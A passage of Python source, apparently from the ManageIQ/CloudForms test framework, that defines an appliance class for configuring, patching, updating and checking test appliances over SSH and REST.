self.browser_steal = kwargs.get("browser_steal", self.browser_steal)
return self
def __enter__(self):
""" This method will replace the current appliance in the store """
stack.push(self)
return self
def _screenshot_capture_at_context_leave(self, exc_type, exc_val, exc_tb):
try:
from cfme.fixtures.artifactor_plugin import fire_art_hook
from pytest import config
from fixture.pytest_store import store
except ImportError:
logger.info('Not inside pytest run, ignoring')
return
        if exc_type is not None and not RUNNING_UNDER_SPROUT:
from cfme.utils.browser import take_screenshot
logger.info("Before we pop this appliance, a screenshot and a traceback will be taken.")
ss, ss_error = take_screenshot()
full_tb = "".join(traceback.format_tb(exc_tb))
short_tb = "{}: {}".format(exc_type.__name__, str(exc_val))
full_tb = "{}\n{}".format(full_tb, short_tb)
g_id = "appliance-cm-screenshot-{}".format(fauxfactory.gen_alpha(length=6))
fire_art_hook(
config, 'filedump',
slaveid=store.slaveid,
description="Appliance CM error traceback", contents=full_tb, file_type="traceback",
display_type="danger", display_glyph="align-justify", group_id=g_id)
if ss:
fire_art_hook(
config, 'filedump',
slaveid=store.slaveid, description="Appliance CM error screenshot",
file_type="screenshot", mode="wb", contents_base64=True, contents=ss,
display_glyph="camera", group_id=g_id)
if ss_error:
fire_art_hook(
config, 'filedump',
slaveid=store.slaveid,
description="Appliance CM error screenshot failure", mode="w",
contents_base64=False, contents=ss_error, display_type="danger", group_id=g_id)
elif exc_type is not None:
logger.info("Error happened but we are not inside a test run so no screenshot now.")
def __exit__(self, exc_type, exc_val, exc_tb):
try:
self._screenshot_capture_at_context_leave(exc_type, exc_val, exc_tb)
except Exception:
# repr is used in order to avoid having the appliance object in the log record
logger.exception("taking a screenshot for %s failed", repr(self))
finally:
assert stack.pop() is self, 'appliance stack inconsistent'
def __eq__(self, other):
return isinstance(other, IPAppliance) and self.hostname == other.hostname
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return hash(self.hostname)
@cached_property
def rest_logger(self):
return create_sublogger('rest-api')
# Configuration methods
@logger_wrap("Configure IPAppliance: {}")
def configure(self, log_callback=None, **kwargs):
"""Configures appliance - database setup, rename, ntp sync
Utility method to make things easier.
        Note:
            name_to_set is not used currently.
Args:
db_address: Address of external database if set, internal database if ``None``
(default ``None``)
name_to_set: Name to set the appliance name to if not ``None`` (default ``None``)
region: Number to assign to region (default ``0``)
fix_ntp_clock: Fixes appliance time if ``True`` (default ``True``)
loosen_pgssl: Loosens postgres connections if ``True`` (default ``True``)
key_address: Fetch encryption key from this address if set, generate a new key if
``None`` (default ``None``)
on_openstack: If appliance is running on Openstack provider (default ``False``)
on_gce: If appliance is running on GCE provider (default ``False``)
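        Usage (a minimal sketch; the address and argument values are illustrative):
            ipapp = IPAppliance('10.11.12.13')
            ipapp.configure(region=0, fix_ntp_clock=True)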
"""
log_callback("Configuring appliance {}".format(self.hostname))
loosen_pgssl = kwargs.pop('loosen_pgssl', True)
fix_ntp_clock = kwargs.pop('fix_ntp_clock', True)
region = kwargs.pop('region', 0)
key_address = kwargs.pop('key_address', None)
db_address = kwargs.pop('db_address', None)
on_openstack = kwargs.pop('on_openstack', False)
on_gce = kwargs.pop('on_gce', False)
with self as ipapp:
ipapp.wait_for_ssh()
# Debugging - ifcfg-eth0 overwritten by unknown process
            # Rules are permanent and will be reloaded after machine reboot
self.ssh_client.run_command(
"cp -pr /etc/sysconfig/network-scripts/ifcfg-eth0 /var/tmp", ensure_host=True)
self.ssh_client.run_command(
"echo '-w /etc/sysconfig/network-scripts/ifcfg-eth0 -p wa' >> "
"/etc/audit/rules.d/audit.rules", ensure_host=True)
self.ssh_client.run_command("systemctl daemon-reload", ensure_host=True)
self.ssh_client.run_command("service auditd restart", ensure_host=True)
ipapp.wait_for_ssh()
self.deploy_merkyl(start=True, log_callback=log_callback)
if fix_ntp_clock and not self.is_pod:
self.fix_ntp_clock(log_callback=log_callback)
# TODO: Handle external DB setup
# This is workaround for appliances to use only one disk for the VMDB
# If they have been provisioned with a second disk in the infra,
# 'self.unpartitioned_disks' should exist and therefore this won't run.
if self.is_downstream and not self.unpartitioned_disks:
self.db.create_db_lvm()
self.db.setup(region=region, key_address=key_address,
db_address=db_address, is_pod=self.is_pod)
if on_gce:
                # evmserverd does not auto-start on GCE instances
self.start_evm_service(log_callback=log_callback)
self.wait_for_evm_service(timeout=1200, log_callback=log_callback)
# Some conditionally ran items require the evm service be
# restarted:
restart_evm = False
if loosen_pgssl:
self.db.loosen_pgssl()
restart_evm = True
if self.version >= '5.8':
self.configure_vm_console_cert(log_callback=log_callback)
restart_evm = True
if restart_evm:
self.restart_evm_service(log_callback=log_callback)
self.wait_for_web_ui(timeout=1800, log_callback=log_callback)
def configure_gce(self, log_callback=None):
# Force use of IPAppliance's configure method
return IPAppliance.configure(self, on_gce=True)
def seal_for_templatizing(self):
"""Prepares the VM to be "generalized" for saving as a template."""
with self.ssh_client as ssh_client:
# Seals the VM in order to work when spawned again.
ssh_client.run_command("rm -rf /etc/ssh/ssh_host_*", ensure_host=True)
if ssh_client.run_command(
"grep '^HOSTNAME' /etc/sysconfig/network", ensure_host=True).success:
# Replace it
ssh_client.run_command(
"sed -i -r -e 's/^HOSTNAME=.*$/HOSTNAME=localhost.localdomain/' "
"/etc/sysconfig/network", ensure_host=True)
else:
# Set it
ssh_client.run_command(
"echo HOSTNAME=localhost.localdomain >> /etc/sysconfig/network",
ensure_host=True)
ssh_client.run_command(
"sed -i -r -e '/^HWADDR/d' /etc/sysconfig/network-scripts/ifcfg-eth0",
ensure_host=True)
ssh_client.run_command(
"sed -i -r -e '/^UUID/d' /etc/sysconfig/network-scripts/ifcfg-eth0",
ensure_host=True)
ssh_client.run_command("rm -f /etc/udev/rules.d/70-*", ensure_host=True)
# Fix SELinux things
ssh_client.run_command("restorecon -R /etc/sysconfig/network-scripts", ensure_host=True)
ssh_client.run_command("restorecon /etc/sysconfig/network", ensure_host=True)
# Stop the evmserverd and move the logs somewhere
ssh_client.run_command("systemctl stop evmserverd", ensure_host=True)
ssh_client.run_command("mkdir -p /var/www/miq/vmdb/log/preconfigure-logs",
ensure_host=True)
ssh_client.run_command(
"mv /var/www/miq/vmdb/log/*.log /var/www/miq/vmdb/log/preconfigure-logs/",
ensure_host=True)
ssh_client.run_command(
"mv /var/www/miq/vmdb/log/*.gz /var/www/miq/vmdb/log/preconfigure-logs/",
ensure_host=True)
# Reduce swapping, because it can do nasty things to our providers
ssh_client.run_command('echo "vm.swappiness = 1" >> /etc/sysctl.conf',
ensure_host=True)
def _encrypt_string(self, string):
try:
# Let's not log passwords
logging.disable(logging.CRITICAL)
result = self.ssh_client.run_rails_command(
"\"puts MiqPassword.encrypt('{}')\"".format(string))
return result.output.strip()
finally:
logging.disable(logging.NOTSET)
@property
def managed_provider_names(self):
"""Returns a list of names for all providers configured on the appliance
Note:
Unlike ``managed_known_providers``, this will also return names of providers that were
not recognized, but are present.
"""
known_ems_list = []
for ems in self.rest_api.collections.providers:
if not any(
p_type in ems['type'] for p_type in RECOGNIZED_BY_IP + RECOGNIZED_BY_CREDS):
continue
known_ems_list.append(ems['name'])
return known_ems_list
@property
def managed_known_providers(self):
"""Returns a set of provider crud objects of known providers managed by this appliance
Note:
Recognized by name only.
"""
from cfme.utils.providers import list_providers
prov_cruds = list_providers(use_global_filters=False)
found_cruds = set()
unrecognized_ems_names = set()
for ems_name in self.managed_provider_names:
for prov in prov_cruds:
# Name check is authoritative and the only proper way to recognize a known provider
if ems_name == prov.name:
found_cruds.add(prov)
break
else:
unrecognized_ems_names.add(ems_name)
if unrecognized_ems_names:
self.log.warning(
"Unrecognized managed providers: {}".format(', '.join(unrecognized_ems_names)))
return list(found_cruds)
@classmethod
def from_url(cls, url, **kwargs):
"""Create an appliance instance from a URL.
Supported format using a simple regexp expression:
``(https?://)?hostname_or_ip(:port)?/?``
Args:
url: URL to be parsed from
**kwargs: For setting and overriding the params parsed from the URL
Returns:
A :py:class:`IPAppliance` instance.
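        Usage (illustrative; the URL below is a placeholder):
            app = IPAppliance.from_url('https://10.11.12.13:8443')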
"""
if not isinstance(url, six.string_types):
raise TypeError('url for .from_url must be a string')
parsed = urlparse(url)
new_kwargs = {}
if parsed.netloc:
host_part = parsed.netloc
elif parsed.path and not parsed.netloc:
# If you only pass the hostname (+ port possibly) without scheme or anything else
host_part = parsed.path
else:
raise ValueError('Unsupported url specification: {}'.format(url))
if ':' in host_part:
hostname, port = host_part.rsplit(':', 1)
port = int(port)
else:
hostname = host_part
if parsed.scheme:
port = cls.PROTOCOL_PORT_MAPPING[parsed.scheme]
else:
port = None
new_kwargs['hostname'] = hostname
if port is not None:
new_kwargs['ui_port'] = port
if parsed.scheme:
new_kwargs['ui_protocol'] = parsed.scheme
new_kwargs.update(kwargs)
return cls(**new_kwargs)
def new_rest_api_instance(
self, entry_point=None, auth=None, logger="default", verify_ssl=False):
"""Returns new REST API instance."""
return MiqApi(
entry_point=entry_point or self.url_path('/api'),
auth=auth or (conf.credentials["default"]["username"],
conf.credentials["default"]["password"]),
logger=self.rest_logger if logger == "default" else logger,
verify_ssl=verify_ssl)
@cached_property
def rest_api(self):
return self.new_rest_api_instance()
@cached_property
def miqqe_version(self):
"""Returns version of applied JS patch or None if not present"""
result = self.ssh_client.run_command('grep "[0-9]\+" /var/www/miq/vmdb/.miqqe_version')
if result.success:
return int(result.output)
return None
@property
def url(self):
"""Returns a proper URL of the appliance.
        If the ports do not correspond to the protocols' default port numbers, then the ports are
explicitly specified as well.
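        For example, ``https://10.11.12.13/`` or ``https://10.11.12.13:8444/`` (illustrative).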
"""
show_port = self.PROTOCOL_PORT_MAPPING[self.ui_protocol] != self.ui_port
if show_port:
return '{}://{}:{}/'.format(self.ui_protocol, self.hostname, self.ui_port)
else:
return '{}://{}/'.format(self.ui_protocol, self.hostname)
def url_path(self, path):
"""generates URL with an additional path. Useful for generating REST or SSUI URLs."""
return '{}/{}'.format(self.url.rstrip('/'), path.lstrip('/'))
@property
def disks_and_partitions(self):
"""Returns list of all disks and partitions"""
disks_and_partitions = self.ssh_client.run_command(
"ls -1 /dev/ | egrep '^[sv]d[a-z][0-9]?'").output.strip()
disks_and_partitions = re.split(r'\s+', disks_and_partitions)
return sorted('/dev/{}'.format(disk) for disk in disks_and_partitions)
@property
def disks(self):
"""Returns list of disks only, excludes their partitions"""
disk_regexp = re.compile('^/dev/[sv]d[a-z]$')
return [
disk for disk in self.disks_and_partitions
if disk_regexp.match(disk)
]
@property
def unpartitioned_disks(self):
"""Returns list of any disks that have no partitions"""
partition_regexp = re.compile('^/dev/[sv]d[a-z][0-9]$')
unpartitioned_disks = set()
for disk in self.disks:
add = True
for dp in self.disks_and_partitions:
if dp.startswith(disk) and partition_regexp.match(dp) is not None:
add = False
if add:
unpartitioned_disks.add(disk)
return sorted(disk for disk in unpartitioned_disks)
@cached_property
def product_name(self):
try:
return self.rest_api.product_info['name']
except (AttributeError, KeyError, IOError):
self.log.exception(
'appliance.product_name could not be retrieved from REST, falling back')
try:
# TODO: Review this section. Does not work unconfigured
# # We need to print to a file here because the deprecation warnings make it hard
# # to get robust output and they do not seem to go to stderr
# result = self.ssh_client.run_rails_command(
# '"File.open(\'/tmp/product_name.txt\', \'w\') '
# '{|f| f.write(I18n.t(\'product.name\')) }"')
# result = self.ssh_client.run_command('cat /tmp/product_name.txt')
# return result.output
res = self.ssh_client.run_command('cat /etc/redhat-release')
if res.failed:
raise RuntimeError('Unable to retrieve /etc/redhat-release')
version_string = res.output.strip()
if 'CentOS' in version_string:
return 'ManageIQ'
else:
return 'CFME'
except Exception:
logger.exception(
"Couldn't fetch the product name from appliance, using ManageIQ as default")
return 'ManageIQ'
@cached_property
def is_downstream(self):
return self.product_name == 'CFME'
@cached_property
def version(self):
try:
return Version(self.rest_api.server_info['version'])
except (AttributeError, KeyError, IOError, APIException):
self.log.exception('appliance.version could not be retrieved from REST, falling back')
return self.ssh_client.vmdb_version
@cached_property
def build(self):
if not self.is_downstream:
return 'master'
try:
return self.rest_api.server_info['build']
except (AttributeError, KeyError, IOError):
self.log.exception('appliance.build could not be retrieved from REST, falling back')
res = self.ssh_client.run_command('cat /var/www/miq/vmdb/BUILD')
if res.failed:
raise RuntimeError('Unable to retrieve appliance VMDB version')
return res.output.strip("\n")
@cached_property
def os_version(self):
# Currently parses the os version out of redhat release file to allow for
# rhel and centos appliances
res = self.ssh_client.run_command(
r"cat /etc/redhat-release | sed 's/.* release \(.*\) (.*/\1/' #)")
if res.failed:
raise RuntimeError('Unable to retrieve appliance OS version')
return Version(res.output)
@cached_property
def log(self):
return create_sublogger(self.hostname)
@cached_property
def coverage(self):
return ui_coverage.CoverageManager(self)
def ssh_client_with_privatekey(self):
with open(conf_path.join('appliance_private_key').strpath, 'w') as key:
key.write(conf.credentials['ssh']['private_key'])
connect_kwargs = {
'hostname': self.hostname,
'username': conf.credentials['ssh']['ssh-user'],
'key_filename': conf_path.join('appliance_private_key').strpath,
}
ssh_client = ssh.SSHClient(**connect_kwargs)
# FIXME: properly store ssh clients we made
store.ssh_clients_to_close.append(ssh_client)
return ssh_client
@cached_property
def ssh_client(self):
"""Creates an ssh client connected to this appliance
Returns: A configured :py:class:``utils.ssh.SSHClient`` instance.
Usage:
with appliance.ssh_client as ssh:
result = ssh.run_command('...')
Note:
The credentials default to those found under ``ssh`` key in ``credentials.yaml``.
"""
if not self.is_ssh_running:
raise Exception('SSH is unavailable')
# IPAppliance.ssh_client only connects to its address
if self.openshift_creds:
connect_kwargs = {
'hostname': self.openshift_creds['hostname'],
'username': self.openshift_creds['ssh']['username'],
'password': self.openshift_creds['ssh']['password'],
'oc_username': self.openshift_creds['username'],
'oc_password': self.openshift_creds['password'],
'container': self.container,
'is_pod': self.is_pod,
'port': self.ssh_port,
'project': self.project
}
else:
connect_kwargs = {
'hostname': self.hostname,
'username': conf.credentials['ssh']['username'],
'password': conf.credentials['ssh']['password'],
'container': self.container,
'is_pod': self.is_pod,
'port': self.ssh_port,
}
if self.is_dev:
connect_kwargs.update({'is_dev': True})
ssh_client = ssh.SSHClient(**connect_kwargs)
try:
ssh_client.get_transport().is_active()
logger.info('default appliance ssh credentials are valid')
except Exception as e:
if self.is_dev:
                raise Exception('SSH access on a dev appliance is unsupported')
logger.error(e)
logger.error('default appliance ssh credentials failed, trying establish ssh connection'
' using ssh private key')
ssh_client = self.ssh_client_with_privatekey()
# FIXME: properly store ssh clients we made
store.ssh_clients_to_close.append(ssh_client)
return ssh_client
@property
def swap(self):
"""Retrieves the value of swap for the appliance. Might raise an exception if SSH fails.
Return:
An integer value of swap in the VM in megabytes. If ``None`` is returned, it means it
was not possible to parse the command output.
Raises:
:py:class:`paramiko.ssh_exception.SSHException` or :py:class:`socket.error`
"""
try:
server = self.rest_api.get_entity_by_href(self.rest_api.server_info['server_href'])
return server.system_swap_used / 1024 / 1024
except (AttributeError, KeyError, IOError):
self.log.exception('appliance.swap could not be retrieved from REST, falling back')
value = self.ssh_client.run_command(
'free -m | tr -s " " " " | cut -f 3 -d " " | tail -n 1', reraise=True, timeout=15)
try:
value = int(value.output.strip())
except (TypeError, ValueError):
value = None
return value
def event_listener(self):
"""Returns an instance of the event listening class pointed to this appliance."""
# There is no REST API for event streams on versions < 5.9
if self.version <= '5.9':
from cfme.utils.events_db import DbEventListener
return DbEventListener(self)
else:
from cfme.utils.events import RestEventListener
return RestEventListener(self)
def diagnose_evm_failure(self):
"""Go through various EVM processes, trying to figure out what fails
Returns: A string describing the error, or None if no errors occurred.
This is intended to be run after an appliance is configured but failed for some reason,
such as in the template tester.
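        Usage (sketch):
            error = appliance.diagnose_evm_failure()
            if error:
                logger.error('EVM diagnosis: %s', error)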
"""
logger.info('Diagnosing EVM failures, this can take a while...')
if not self.hostname:
return 'appliance has no IP Address; provisioning failed or networking is broken'
logger.info('Checking appliance SSH Connection')
if not self.is_ssh_running:
return 'SSH is not running on the appliance'
# Now for the DB
logger.info('Checking appliance database')
if not self.db.online:
# postgres isn't running, try to start it
cmd = 'systemctl restart {}-postgresql'.format(self.db.postgres_version)
result = self.db.ssh_client.run_command(cmd)
if result.failed:
return 'postgres failed to start:\n{}'.format(result.output)
else:
return 'postgres was not running for unknown reasons'
if not self.db.has_database:
return 'vmdb_production database does not exist'
if not self.db.has_tables:
return 'vmdb_production has no tables'
# try to start EVM
logger.info('Checking appliance evmserverd service')
try:
self.restart_evm_service()
except ApplianceException as ex:
return 'evmserverd failed to start:\n{}'.format(ex.args[0])
# This should be pretty comprehensive, but we might add some net_checks for
# 3000, 4000, and 80 at this point, and waiting a reasonable amount of time
# before exploding if any of them don't appear in time after evm restarts.
@logger_wrap("Fix NTP Clock: {}")
def fix_ntp_clock(self, log_callback=None):
"""Fixes appliance time using ntpdate on appliance"""
log_callback('Fixing appliance clock')
client = self.ssh_client
# checking whether chrony is installed
check_cmd = 'yum list installed chrony'
if client.run_command(check_cmd).failed:
raise ApplianceException("Chrony isn't installed")
        # checking whether it is enabled, and enable it if not
is_enabled_cmd = 'systemctl is-enabled chronyd'
if client.run_command(is_enabled_cmd).failed:
logger.debug("chrony will start on system startup")
client.run_command('systemctl enable chronyd')
client.run_command('systemctl daemon-reload')
# Retrieve time servers from yamls
server_template = 'server {srv} iburst'
time_servers = set()
try:
logger.debug('obtaining clock servers from config file')
clock_servers = conf.cfme_data.get('clock_servers')
for clock_server in clock_servers:
time_servers.add(server_template.format(srv=clock_server))
except TypeError:
msg = 'No clock servers configured in cfme_data.yaml'
log_callback(msg)
raise ApplianceException(msg)
filename = '/etc/chrony.conf'
chrony_conf = set(client.run_command("cat {f}".format(f=filename)).output.strip()
.split('\n'))
modified_chrony_conf = chrony_conf.union(time_servers)
if modified_chrony_conf != chrony_conf:
modified_chrony_conf = "\n".join(list(modified_chrony_conf))
client.run_command('echo "{txt}" > {f}'.format(txt=modified_chrony_conf, f=filename))
logger.info("chrony's config file updated")
conf_file_updated = True
else:
logger.info("chrony's config file hasn't been changed")
conf_file_updated = False
if conf_file_updated or client.run_command('systemctl status chronyd').failed:
logger.debug('restarting chronyd')
client.run_command('systemctl restart chronyd')
# check that chrony is running correctly now
result = client.run_command('chronyc tracking')
if result.success:
logger.info('chronyc is running correctly')
else:
raise ApplianceException("chrony doesn't work. "
"Error message: {e}".format(e=result.output))
@property
def is_miqqe_patch_candidate(self):
return self.version < "5.6.3"
@property
def miqqe_patch_applied(self):
return self.miqqe_version == current_miqqe_version
@logger_wrap("Patch appliance with MiqQE js: {}")
def patch_with_miqqe(self, log_callback=None):
# (local_path, remote_path, md5/None) trio
autofocus_patch = pick({
'5.5': 'autofocus.js.diff',
'5.7': 'autofocus_57.js.diff'
})
patch_args = (
(str(patches_path.join('miq_application.js.diff')),
'/var/www/miq/vmdb/app/assets/javascripts/miq_application.js',
None),
(str(patches_path.join(autofocus_patch)),
'/var/www/miq/vmdb/app/assets/javascripts/directives/autofocus.js',
None),
)
for local_path, remote_path, md5 in patch_args:
self.ssh_client.patch_file(local_path, remote_path, md5)
self.precompile_assets()
self.restart_evm_service()
logger.info("Waiting for Web UI to start")
wait_for(
func=self.is_web_ui_running,
message='appliance.is_web_ui_running',
delay=20,
timeout=300)
logger.info("Web UI is up and running")
self.ssh_client.run_command(
"echo '{}' > /var/www/miq/vmdb/.miqqe_version".format(current_miqqe_version))
# Invalidate cached version
del self.miqqe_version
@logger_wrap("Work around missing Gem file: {}")
def workaround_missing_gemfile(self, log_callback=None):
"""Fix Gemfile issue.
        Early 5.4 builds have issues with the Gemfile not being present (BUG 1191496). This
        circumvents the issue by pointing the env variable that Bundler uses to locate the
        Gemfile to the Gemfile in vmdb, which *should* be correct.
When this issue is resolved, this method will do nothing.
"""
client = self.ssh_client
result = client.run_command("ls /opt/rh/cfme-gemset")
if result.failed:
return # Not needed
log_callback('Fixing Gemfile issue')
# Check if the error is there
result = client.run_rails_command("puts 1")
if result.success:
return # All OK!
client.run_command('echo "export BUNDLE_GEMFILE=/var/www/miq/vmdb/Gemfile" >> /etc/bashrc')
# To be 100% sure
self.reboot(wait_for_web_ui=False, log_callback=log_callback)
@logger_wrap("Precompile assets: {}")
def precompile_assets(self, log_callback=None):
"""Precompile the static assets (images, css, etc) on an appliance
"""
log_callback('Precompiling assets')
client = self.ssh_client
store.terminalreporter.write_line('Precompiling assets')
store.terminalreporter.write_line(
'THIS IS NOT STUCK. Just wait until it\'s done, it will be only done once', red=True)
store.terminalreporter.write_line('Phase 1 of 2: rake assets:clobber')
result = client.run_rake_command("assets:clobber")
if result.failed:
msg = 'Appliance {} failed to nuke old assets'.format(self.hostname)
log_callback(msg)
raise ApplianceException(msg)
store.terminalreporter.write_line('Phase 2 of 2: rake assets:precompile')
result = client.run_rake_command("assets:precompile")
if result.failed:
msg = 'Appliance {} failed to precompile assets'.format(self.hostname)
log_callback(msg)
raise ApplianceException(msg)
store.terminalreporter.write_line('Asset precompilation done')
return result.rc
@logger_wrap("Clone automate domain: {}")
def clone_domain(self, source="ManageIQ", dest="Default", log_callback=None):
"""Clones Automate domain
Args:
            source: Source domain name.
            dest: Destination domain name.
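        Usage (sketch):
            appliance.clone_domain(source='ManageIQ', dest='Default')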
"""
client = self.ssh_client
# Make sure the database is ready
log_callback('Waiting for database')
self.db.wait_for()
# Make sure the working dir exists
client.run_command('mkdir -p /tmp/{}'.format(source))
export_opts = 'DOMAIN={} EXPORT_DIR=/tmp/{} PREVIEW=false OVERWRITE=true'.format(source,
source)
export_cmd = 'evm:automate:export {}'.format(export_opts)
log_callback('Exporting domain ({}) ...'.format(export_cmd))
result = client.run_rake_command(export_cmd)
if result.failed:
msg = 'Failed to export {} domain'.format(source)
log_callback(msg)
raise ApplianceException(msg)
ro_fix_cmd = ("sed -i 's/system: true/system: false/g' "
"/tmp/{}/{}/__domain__.yaml".format(source, source))
result = client.run_command(ro_fix_cmd)
if result.failed:
msg = 'Setting {} domain to read/write failed'.format(dest)
log_callback(msg)
raise ApplianceException(msg)
import_opts = 'DOMAIN={} IMPORT_DIR=/tmp/{} PREVIEW=false'.format(source, source)
import_opts += ' OVERWRITE=true IMPORT_AS={} ENABLED=true'.format(dest)
import_cmd = 'evm:automate:import {}'.format(import_opts)
log_callback('Importing domain ({}) ...'.format(import_cmd))
result = client.run_rake_command(import_cmd)
if result.failed:
msg = 'Failed to import {} domain'.format(dest)
log_callback(msg)
raise ApplianceException(msg)
return result.rc, result.output
@logger_wrap("Deploying Merkyl: {}")
def deploy_merkyl(self, start=False, log_callback=None):
"""Deploys the Merkyl log relay service to the appliance"""
client = self.ssh_client
client.run_command('mkdir -p /root/merkyl')
for filename in ['__init__.py', 'merkyl.tpl', ('bottle.py.dontflake', 'bottle.py'),
'allowed.files']:
try:
src, dest = filename
except (TypeError, ValueError):
# object is not iterable or too many values to unpack
src = dest = filename
log_callback('Sending {} to appliance'.format(src))
client.put_file(data_path.join(
'bundles', 'merkyl', src).strpath, os.path.join('/root/merkyl', dest))
client.put_file(data_path.join(
'bundles', 'merkyl', 'merkyl').strpath, os.path.join('/etc/init.d/merkyl'))
client.run_command('chmod 775 /etc/init.d/merkyl')
client.run_command(
'/bin/bash -c \'if ! [[ $(iptables -L -n | grep "state NEW tcp dpt:8192") ]]; then '
'iptables -I INPUT 6 -m state --state NEW -m tcp -p tcp --dport 8192 -j ACCEPT; fi\'')
if start:
log_callback("Starting ...")
client.run_command('systemctl restart merkyl')
log_callback("Setting it to start after reboot")
client.run_command("chkconfig merkyl on")
def get_repofile_list(self):
"""Returns list of repofiles present at the appliance.
Ignores certain files, like redhat.repo.
"""
repofiles = self.ssh_client.run_command('ls /etc/yum.repos.d').output.strip().split('\n')
return [f for f in repofiles if f not in {"redhat.repo"} and f.endswith(".repo")]
def read_repos(self):
"""Reads repofiles so it gives you mapping of id and url."""
result = {}
name_regexp = re.compile(r"^\[update-([^\]]+)\]")
baseurl_regexp = re.compile(r"baseurl\s*=\s*([^\s]+)")
for repofile in self.get_repofile_list():
            cmd_result = self.ssh_client.run_command("cat /etc/yum.repos.d/{}".format(repofile))
            if cmd_result.failed:
                # Something happened meanwhile?
                continue
            out = cmd_result.output.strip()
name_match = name_regexp.search(out)
if name_match is None:
continue
baseurl_match = baseurl_regexp.search(out)
if baseurl_match is None:
continue
result[name_match.groups()[0]] = baseurl_match.groups()[0]
return result
# Regexp that looks for product type and version in the update URL
product_url_regexp = re.compile(
r"/((?:[A-Z]+|CloudForms|rhel|RHEL_Guest))(?:-|/|/server/)(\d+[^/]*)/")
def find_product_repos(self):
"""Returns a dictionary of products, where the keys are names of product (repos) and values
are dictionaries where keys are the versions and values the names of the repositories.
"""
products = {}
for repo_name, repo_url in self.read_repos().items():
match = self.product_url_regexp.search(repo_url)
if match is None:
continue
product, ver = match.groups()
if product not in products:
products[product] = {}
products[product][ver] = repo_name
return products
def write_repofile(self, repo_id, repo_url, **kwargs):
"""Wrapper around writing a repofile. You can specify conf options in kwargs."""
if "gpgcheck" not in kwargs:
kwargs["gpgcheck"] = 0
if "enabled" not in kwargs:
kwargs["enabled"] = 1
filename = "/etc/yum.repos.d/{}.repo".format(repo_id)
logger.info("Writing a new repofile %s %s", repo_id, repo_url)
self.ssh_client.run_command('echo "[update-{}]" > {}'.format(repo_id, filename))
self.ssh_client.run_command('echo "name=update-url-{}" >> {}'.format(repo_id, filename))
self.ssh_client.run_command('echo "baseurl={}" >> {}'.format(repo_url, filename))
for k, v in kwargs.items():
self.ssh_client.run_command('echo "{}={}" >> {}'.format(k, v, filename))
return repo_id
def add_product_repo(self, repo_url, **kwargs):
"""This method ensures that when we add a new repo URL, there will be no other version
of such product present in the yum.repos.d. You can specify conf options in kwargs. They
will be applied only to newly created repo file.
Returns:
The repo id.
"""
match = self.product_url_regexp.search(repo_url)
if match is None:
raise ValueError(
"The URL {} does not contain information about product and version.".format(
repo_url))
for repo_id, url in self.read_repos().items():
if url == repo_url:
# It is already there, so just enable it
self.enable_disable_repo(repo_id, True)
return repo_id
product, ver = match.groups()
repos = self.find_product_repos()
if product in repos:
for v, i in repos[product].items():
logger.info("Deleting %s repo with version %s (%s)", product, v, i)
self.ssh_client.run_command("rm -f /etc/yum.repos.d/{}.repo".format(i))
return self.write_repofile(fauxfactory.gen_alpha(), repo_url, **kwargs)
def enable_disable_repo(self, repo_id, enable):
logger.info("%s repository %s", "Enabling" if enable else "Disabling", repo_id)
return self.ssh_client.run_command(
"sed -i 's/^enabled=./enabled={}/' /etc/yum.repos.d/{}.repo".format(
1 if enable else 0, repo_id)).success
@logger_wrap("Update RHEL: {}")
def update_rhel(self, *urls, **kwargs):
"""Update RHEL on appliance
Will pull URLs from the 'updates_urls' environment variable (whitespace-separated URLs),
or cfme_data.
If the env var is not set, URLs will be pulled from cfme_data.
If the env var is set, it is the only source for update URLs.
Generic rhel update URLs cfme_data.get('basic_info', {})['rhel_updates_urls'] (yaml list)
On downstream builds, an additional RH SCL updates url can be inserted at
cfme_data.get('basic_info', {})['rhscl_updates_urls'].
If the ``skip_broken`` kwarg is passed, and evaluated as True, broken packages will be
ignored in the yum update.
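        Usage (a sketch; the URL is a placeholder):
            appliance.update_rhel('http://example.com/rhel7/updates/', reboot=True)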
"""
urls = list(urls)
log_callback = kwargs.pop("log_callback")
skip_broken = kwargs.pop("skip_broken", False)
reboot = kwargs.pop("reboot", True)
streaming = kwargs.pop("streaming", False)
cleanup = kwargs.pop('cleanup', False)
log_callback('updating appliance')
if not urls:
basic_info = conf.cfme_data.get('basic_info', {})
if os.environ.get('updates_urls'):
# try to pull URLs from env if var is non-empty
                urls.extend(os.environ['updates_urls'].split())
else:
# fall back to cfme_data
updates_url = basic_info.get('rhel7_updates_url')
if updates_url:
urls.append(updates_url)
if streaming:
client = self.ssh_client(stream_output=True)
else:
client = self.ssh_client
if cleanup:
client.run_command(
"cd /etc/yum.repos.d && find . -not -name 'redhat.repo' "
"-not -name 'rhel-source.repo' -not -name . -exec rm {} \;")
for url in urls:
self.add_product_repo(url)
# update
log_callback('Running rhel updates on appliance')
# clean yum beforehand to clear metadata from earlier update repos, if any
try:
skip = '--skip-broken' if skip_broken else ''
result = client.run_command('yum update -y --nogpgcheck {}'.format(skip),
timeout=3600)
except socket.timeout:
msg = 'SSH timed out while updating appliance, exiting'
log_callback(msg)
# failure to update is fatal, kill this process
raise KeyboardInterrupt(msg)
self.log.error(result.output)
if result.failed:
self.log.error('appliance update failed')
msg = 'Appliance {} failed to update RHEL, error in logs'.format(self.hostname)
log_callback(msg)
raise ApplianceException(msg)
if reboot:
self.reboot(wait_for_web_ui=False, log_callback=log_callback)
return result
def utc_time(self):
client = self.ssh_client
result = client.run_command('date --iso-8601=seconds -u')
if result.success:
return dateutil.parser.parse(result.output)
else:
raise Exception("Couldn't get datetime: {}".format(result.output))
def _check_appliance_ui_wait_fn(self):
# Get the URL, don't verify ssl cert
try:
response = requests.get(self.url, timeout=15, verify=False)
if response.status_code == 200:
self.log.info("Appliance online")
return True
else:
self.log.debug('Appliance online, status code %s', response.status_code)
except requests.exceptions.Timeout:
self.log.debug('Appliance offline, connection timed out')
except ValueError:
# requests exposes invalid URLs as ValueErrors, which is excellent
raise
except Exception as ex:
self.log.debug('Appliance online, but connection failed: %s', str(ex))
return False
def is_web_ui_running(self, unsure=False):
"""Triple checks if web UI is up and running
Args:
unsure: Variable to return when not sure if web UI is running or not
(default ``False``)
"""
num_of_tries = 3
was_running_count = 0
for try_num in range(num_of_tries):
if self._check_appliance_ui_wait_fn():
was_running_count += 1
sleep(3)
if was_running_count == 0:
return False
elif was_running_count == num_of_tries:
return True
else:
return unsure
def _evm_service_command(self, command, log_callback, expected_exit_code=None):
"""Runs given systemctl command against the ``evmserverd`` service
Args:
command: Command to run, e.g. "start"
expected_exit_code: If the exit codes don't match, ApplianceException is raised
"""
